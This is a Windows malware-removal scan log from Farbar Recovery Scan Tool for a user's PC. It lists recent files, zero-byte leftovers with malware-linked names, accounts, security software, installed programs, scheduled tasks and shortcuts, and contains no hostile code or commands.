2019-02-15 00:08 - 2018-05-22 09:22 - 000168960 ___SH C:\Users\Stanley\Desktop\Thumbs.db
2019-02-15 00:03 - 2018-06-04 23:16 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\Temp
2019-02-14 02:43 - 2018-05-04 20:08 - 000001326 _____ C:\Users\Public\Desktop\Skype.lnk
2019-02-14 02:43 - 2018-05-04 20:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2019-02-14 02:25 - 2018-04-23 21:43 - 000000000 ____D C:\lNTEL
2019-02-14 02:25 - 2018-04-10 15:07 - 000000000 ____D C:\Users\Stanley\Desktop\URCH
2019-02-14 02:23 - 2018-06-05 13:20 - 000000000 ____D C:\Users\Stanley\Desktop\final
2019-02-14 02:23 - 2018-05-09 22:35 - 000000000 __SHD C:\Users\Stanley\AppData\Roaming\C67FA6
2019-02-12 21:30 - 2018-05-03 17:51 - 000000000 ____D C:\Users\Stanley
2019-02-12 06:38 - 2018-05-12 16:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2019-02-10 23:14 - 2018-06-06 18:15 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios Data Transfer
2019-02-10 23:08 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\Registration
2019-02-10 22:09 - 2018-05-14 11:19 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinAce
2019-02-10 22:04 - 2018-05-04 12:30 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\Mozilla
2019-02-10 07:30 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\AppReadiness
2019-02-09 01:51 - 2018-10-18 00:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iMobie
2019-02-09 01:51 - 2018-10-18 00:37 - 000000000 ____D C:\Program Files (x86)\iMobie
2019-02-08 23:59 - 2018-05-03 23:45 - 000000082 _____ C:\Windows\SysWOW64\winsevr.dat
2019-02-08 23:36 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\IDM
2019-02-08 23:00 - 2018-10-18 01:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft
2019-02-08 23:00 - 2018-10-18 01:09 - 000000000 ____D C:\ProgramData\iSkysoft
2019-02-07 02:08 - 2018-10-18 00:38 - 000000000 ____D C:\Users\Stanley\AppData\Local\iMobie_Inc
2019-02-06 07:21 - 2018-10-20 09:06 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios Data Recovery
2019-02-06 06:29 - 2018-04-24 22:26 - 000000000 ____D C:\Program Files\Recuva
2019-02-06 06:23 - 2018-05-19 23:54 - 000363748 _____ C:\Users\Stanley\Desktop\arms & ammunition.txt
2019-02-06 05:57 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\Downloads\Compressed
2019-02-05 11:33 - 2018-06-06 18:08 - 000000000 ____D C:\Program Files (x86)\Anvsoft
2019-02-05 09:51 - 2018-06-06 21:44 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Apple Computer
2019-02-05 07:07 - 2018-10-18 00:12 - 000000000 ____D C:\ProgramData\Wondershare
2019-02-05 07:06 - 2018-10-18 01:06 - 000000000 ____D C:\Users\Public\Documents\iSkysoft
2019-02-05 07:05 - 2018-10-18 01:09 - 000000000 ____D C:\Program Files (x86)\iSkysoft
2019-02-05 01:31 - 2018-10-18 00:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2019-02-05 00:37 - 2018-10-18 00:06 - 000000000 ____D C:\Users\Public\Documents\Wondershare
2019-02-05 00:16 - 2018-06-06 18:15 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Syncios
2019-01-26 22:19 - 2018-12-27 19:45 - 000000000 ___RD C:\Users\Stanley\OneDrive (3).old
2019-01-25 09:31 - 2018-06-04 00:07 - 000000000 ____D C:\Users\Stanley\AppData\Local\ElevatedDiagnostics
2019-01-24 10:28 - 2018-06-03 08:56 - 000000887 _____ C:\Users\Public\Desktop\VLC media player.lnk
2019-01-23 15:45 - 2018-05-04 07:39 - 000000000 ____D C:\Program Files (x86)\TeamViewer

==================== Files in the root of some directories =======

2018-08-18 10:56 - 2014-12-19 17:43 - 000000034 _____ () C:\Users\Stanley\AppData\Roaming\pdfdrawcodec.dll
2019-02-05 00:49 - 2019-02-05 00:49 - 000140800 _____ () C:\Users\Stanley\AppData\Local\installer.dat
2018-06-02 10:15 - 2018-06-02 10:15 - 000007611 _____ () C:\Users\Stanley\AppData\Local\Resmon.ResmonCfg

Some zero byte size files/folders:
==========================
C:\Windows\mssecsvc.exe
C:\Windows\SysWOW64\taskshostservices.exe
C:\Windows\System32\taskshostservices.exe
C:\Windows\System32\Drivers\WinmonProcessMonitor.sys
C:\Windows\SysWOW64\Drivers\winmon.sys
C:\Windows\SysWOW64\Drivers\winmonfs.sys
C:\Windows\SysWOW64\Drivers\WinmonProcessMonitor.sys

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\dllhost.exe => File is digitally signed
C:\Windows\SysWOW64\dllhost.exe => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2019-02-13 14:45

==================== End of FRST.txt ============================


NEW ADDITION.TXT

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17.02.2019
Ran by #Strazzo.RoseGold## (18-02-2019 01:28:43)
Running from C:\Users\Stanley\Downloads\FRST
Windows 8.1 Enterprise (Update) (X64) (2018-05-03 16:52:27)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

#Strazzo.RoseGold## (S-1-5-21-1692593245-3285590566-2148222763-1001 - Administrator - Enabled) => C:\Users\Stanley
Administrator (S-1-5-21-1692593245-3285590566-2148222763-500 - Administrator - Enabled) => C:\Users\Administrator
Guest (S-1-5-21-1692593245-3285590566-2148222763-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1692593245-3285590566-2148222763-1003 - Limited - Disabled)
RoseGold (S-1-5-21-1692593245-3285590566-2148222763-1004 - Administrator - Enabled) => C:\Users\RoseGold

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
1.1.3 (HKLM-x32\...\{A4046FE1-986B-4463-B4DD-CFA473A7056B}_is1) (Version:  - PDFZilla)
7-Zip 15.14 (HKLM-x32\...\7-Zip) (Version: 15.14 - Igor Pavlov)
Ability Mail Server 4.2.6 (HKLM-x32\...\Ability Mail Server 4_is1) (Version:  - Code Crafters Software Limited)
Adobe Flash Player 20 ActiveX & Plugins 64-bit (HKLM\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
BlackBerry 10 Desktop Software (Blend, Link, Drivers) (HKLM-x32\...\{c33e77db-89b5-4abf-a1d1-97f8b35347e1}) (Version: 1.2.0.52 - BlackBerry)
BlackBerry Blend (HKLM-x32\...\{1DA42C01-4ED2-4B4E-B90C-18FCBA12FC41}) (Version: 1.2.0.50 - BlackBerry Ltd.) Hidden
BlackBerry Communication Drivers (HKLM-x32\...\{46CD5A63-0C1F-45C3-B643-CA87A17275C0}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden
BlackBerry Device Drivers (HKLM-x32\...\{1F6490E5-7540-426D-BC1E-EB57B0BF0C38}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden
BlackBerry Link (HKLM-x32\...\{C42468F9-9812-4550-A54B-5DDB062EB10F}) (Version: 1.2.4.39 - BlackBerry) Hidden
BlackBerry Link Remover (HKLM-x32\...\{44D65CAB-1BC8-47B7-BF5B-3EB8B6BB0276}) (Version: 1.2.4.0 - BlackBerry Ltd.) Hidden
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
FlashPeak Slimjet (HKLM-x32\...\Slimjet) (Version: 7.0.1.0 - FlashPeak Inc.)
GLO 3G PLUS (HKLM-x32\...\GLO 3G PLUS) (Version: 11.300.05.03.251 - Huawei Technologies Co.,Ltd)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 72.0.3626.109 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
HP Hotkey Support (HKLM-x32\...\{6E7401DB-B722-4428-BE94-DD4740CF6464}) (Version: 5.0.28.1 - Hewlett-Packard Company)
HP Software Framework (HKLM-x32\...\{886D1141-25E5-431F-8326-C3DB6FFCCAF0}) (Version: 4.0.96.1 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{930B5F2B-8DB9-42F4-90E4-5D3DC30541C3}) (Version: 12.10.49.21 - HP Inc.)
HP System Event Utility (HKLM-x32\...\{29E20347-C62F-4657-938E-876A182B67F1}) (Version: 1.4.13 - HP Inc.)
iCloud (HKLM\...\{05D97028-FD26-4A3D-BADC-D1CA2E9F1214}) (Version: 7.10.0.9 - Apple Inc.)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.)
KeePass Password Safe 2.39.1 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.39.1 - Dominik Reichl)
LSI HDA Modem (HKLM\...\LSI Soft Modem) (Version: 2.2.100 - LSI Corporation)
Malwarebytes version 3.7.1.2839 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.7.1.2839 - Malwarebytes)
Microsoft .NET Framework 1.1 (HKLM-x32\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM-x32\...\M2698023) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM-x32\...\M2833941) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM-x32\...\M979906) (Version:  - )
Microsoft .NET Framework 1.1 SP1 (HKLM\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version:  - )
Microsoft .NET Framework 1.1 SP1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft Office Professional Edition 2003 (HKLM-x32\...\{90110409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.5614.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
OpenVPN 2.4.6-I602  (HKLM\...\OpenVPN) (Version: 2.4.6-I602 - OpenVPN Technologies, Inc.)
Opera Stable 58.0.3135.65 (HKLM-x32\...\Opera 58.0.3135.65) (Version: 58.0.3135.65 - Opera Software)
PowerISO (HKLM-x32\...\PowerISO) (Version: 7.2 - Power Software Ltd)
Registry Recycler (HKLM-x32\...\Registry Recycler_is1) (Version: 0.9.3.1 - Developer Tribe (Pvt) Ltd.)
SAM CoDeC Pack (HKLM\...\SAM CoDeC Pack) (Version: 5.85 - www.SamLab.ws)
Skype version 8.39 (HKLM-x32\...\Skype_is1) (Version: 8.39 - Skype Technologies S.A.)
SmarterMail Sync for Outlook 2003 and above (HKLM-x32\...\{6567F265-62EC-4BA9-9629-6B483B608854}) (Version: 1.0 - Smarter Tools)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.19.65 - Synaptics Incorporated)
Syncios 6.5.8 (HKLM-x32\...\Syncios) (Version: 6.5.8 - Anvsoft)
Syncios Data Recovery 2.0.5 (HKLM-x32\...\06d5deef-8cb6-52ed-a43f-f181f836384a) (Version: 2.0.5 - Syncios Data Recovery)
TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - )
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.53254 - TeamViewer)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN)
WhatsApp (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\WhatsApp) (Version: 0.3.1409 - WhatsApp)
WinAce Archiver (HKLM-x32\...\WinAce Archiver) (Version: 2.69 - e-merge GmbH)
Windows Driver Package - Google Corporation (androidusb) USB  (11/11/2015 1.0.0020.00000) (HKLM\...\964D20A0C219E8C327639DBA3C1FD49434216922) (Version: 11/11/2015 1.0.0020.00000 - Google Corporation)
Windows Driver Package - Google, Inc. (WinUSB) AndroidUsbDeviceClass  (11/11/2015 2.0.0020.00000) (HKLM\...\B02D55DC05C888A284041A2F8A294C0D557A218C) (Version: 11/11/2015 2.0.0020.00000 - Google, Inc.)
Windows Driver Package - SAMSUNG Electronics Co., Ltd.  (ssudmdm) Modem  (08/24/2016 2.12.4.0) (HKLM\...\B8C7DCAC7E5C993BD8367E5832C6C99E0B248D7A) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. )
Windows Driver Package - SAMSUNG Electronics Co., Ltd.  (WinUSB) AndroidUsbDeviceClass  (08/24/2016 2.12.4.0) (HKLM\...\609138CA03F1F9B54E04FA4DAB7C0C3F28DE9464) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. )
WinRAR 5.30 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2014-04-21] (Tonec Inc. -> Tonec Inc.)
ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers1-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll -> No File
ContextMenuHandlers1-x32: [PhotoStreamsExt] -> {89D984B3-813B-406A-8298-118AFA3A22AE} => C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll [2019-01-15] (Apple Inc. -> Apple Inc.)
ContextMenuHandlers1-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers4-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll -> No File
ContextMenuHandlers4-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers4-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2015-06-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers6-x32: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers6-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {019A414B-EDCF-464E-A4FF-6E1780935AB0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe (HP Inc. -> HP Inc.)
Task: {121858E1-B466-49DB-ABBF-BE0AD32980CE} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001UA => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {44D766A4-890D-4187-8209-27B0E5320737} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe (Apple Inc. -> Apple Inc.)
Task: {4759FCE5-417F-4558-A8AE-4C124D2B53A7} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated -> Synaptics Incorporated)
Task: {4B307496-C19B-4F0D-8A51-8EA93C3082D4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)
Task: {531B0429-4A10-4627-84B1-F2408752272D} - System32\Tasks\HPCeeScheduleFor#Strazzo.RoseGold## => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe (Hewlett-Packard Company -> HP Inc.)
Task: {766C85C7-D024-4937-AD2A-1D565A0EFE0E} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.)
Task: {7F232E68-AE32-41F8-B98F-689DC0D3D5E5} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe (HP Inc. -> HP Inc.)
Task: {8292C123-B9AC-4784-B31B-420E6D1FFE44} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe (HP Inc. -> HP Inc.)
Task: {83DEE68E-A3DD-4AE5-9A83-06EC0861E6BA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)
Task: {9983ADBE-CDF4-4EB7-BA08-126F95152E4E} - System32\Tasks\Opera scheduled Autoupdate 1525449700 => C:\Program Files\Opera\launcher.exe (Opera Software AS -> Opera Software)
Task: {B5D3DB14-5265-4538-9CB9-FDAA4A1D4D8B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.)
Task: {C28388CC-478E-460F-BC73-1BB706E4CB8B} - System32\Tasks\{C2F55618-3604-4E37-AF83-6C71B337894D} => C:\Windows\system32\pcalua.exe -a C:\Users\Stanley\Downloads\Programs\ability-mail-server\setup.exe -d C:\Users\Stanley\Downloads\Programs\ability-mail-server
Task: {DA1D9517-63D2-4DD4-B496-824CB060ABE0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe (HP Inc. -> HP Inc.)
Task: {DCD49F79-E1DD-40AB-8653-E3D1BA2C9E1F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.)
Task: {E6E376AE-3FCC-45F3-89EB-014031777959} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.)
Task: {E9BDD47D-D63C-4F59-8B54-0B30B7E5D664} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001Core => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe+HPCeeScheduleFor#Strazzo.RoseGold## (null)!STRAZZOWEEZY\#Strazzo.Ros

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


Shortcut: C:\Users\Stanley\AppData\Roaming\Microsoft\Windows\Network Shortcuts\My Web Sites on MSN\target.lnk -> hxxp://www.msnusers.co

ShortcutWithArgument: C:\Users\Stanley\Desktop\Chrome Plus - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Default"
ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP 2 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2"
ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP 3 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 3"
ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x0000002a hxxp://www.yandex.ru/?win=331&clid=2100779
ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.Почта.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x00000038 hxxp://mail.yandex.ru/?win=331&clid=2100779&from=dist_tl

==================== Loaded Modules (Whitelisted) ==============

2018-05-16 02:59 - 2018-05-16 02:59 - 000088888 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2019-01-15 01:27 - 2019-01-15 01:27 - 001356088 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2018-04-26 17:24 - 2018-04-26 17:24 - 000226208 _____ () C:\Program Files\OpenVPN\bin\liblzo2-2.dll
2018-04-26 17:24 - 2018-04-26 17:24 - 000127488 _____ () C:\Program Files\OpenVPN\bin\libpkcs11-helper-1.dll
2015-06-02 05:00 - 2015-06-02 05:00 - 000102912 _____ () C:\Windows\System32\IccLibDll_x64.dll
2019-01-23 16:33 - 2019-01-23 16:33 - 000088888 _____ () C:\Program Files\iTunes\zlib1.dll
2019-01-23 16:33 - 2019-01-23 16:33 - 001356088 _____ () C:\Program Files\iTunes\libxml2.dll
2019-02-15 00:30 - 2019-01-25 16:36 - 002845712 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2019-02-15 00:30 - 2019-01-24 11:09 - 002714000 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
